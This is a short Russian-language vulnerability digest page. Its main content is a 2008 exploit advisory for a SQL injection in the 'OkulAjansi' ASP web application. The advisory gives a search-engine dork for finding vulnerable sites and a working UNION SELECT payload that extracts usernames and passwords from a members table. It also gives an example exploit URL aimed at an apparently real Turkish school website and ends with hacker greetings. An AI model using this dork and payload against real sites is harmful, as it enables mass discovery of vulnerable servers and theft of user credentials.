Дополнительная информация

Ежедневная сводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

MorASP Anket Sistemi v2.0 [PID] Bypass Vulnerability (tr)

phpuserbase 1.3 (menu) Remote File Inclusion Vulnerability

gapicms v9.0.2 (dirDepth) Remote File Inclusion Vulnerability

From:	Alemin_Krali Krali <alemin_(at)_windowslive.com>
Date:	12 июля 2008 г.
Subject:	OkulAjansi [ID] Remote SQL Injection Vulnerability

# Title:OkulAjansi [ID] Remote SQL Injection Vulnerability

# Discovered by : Alemin_Krali  

# Dork :inurl:ReDirect.Asp?CatID=

# Exploit:HTTP://SITE.COM/SCRIPT//default.asp?Mode=7&ID=85
union+select+all+0,kullanici,2,sifre,4,5,6,7,8,9,10,11,12,13+from+uyeler

# Example:
http://www.gaziyasargil.k12.tr//default.asp?Mode=7&ID=85%20union+select+a
ll+0,kullanici,2,sifre,4,5,6,7,8,9,10,11,12,13+from+uyeler

# al3m@bsdmail.org


# my friends to sp thnx:Cr@zy_King Kerem125 Jextoxic Abo Mohammed

####################################                        
##############################
                                  #     #    #   |||||||||  #
                                  #    # #  ##       ||     #
                                  #   #  # # #       ||     #
                                  #  #   #   #.      ||     #
                                  ###########################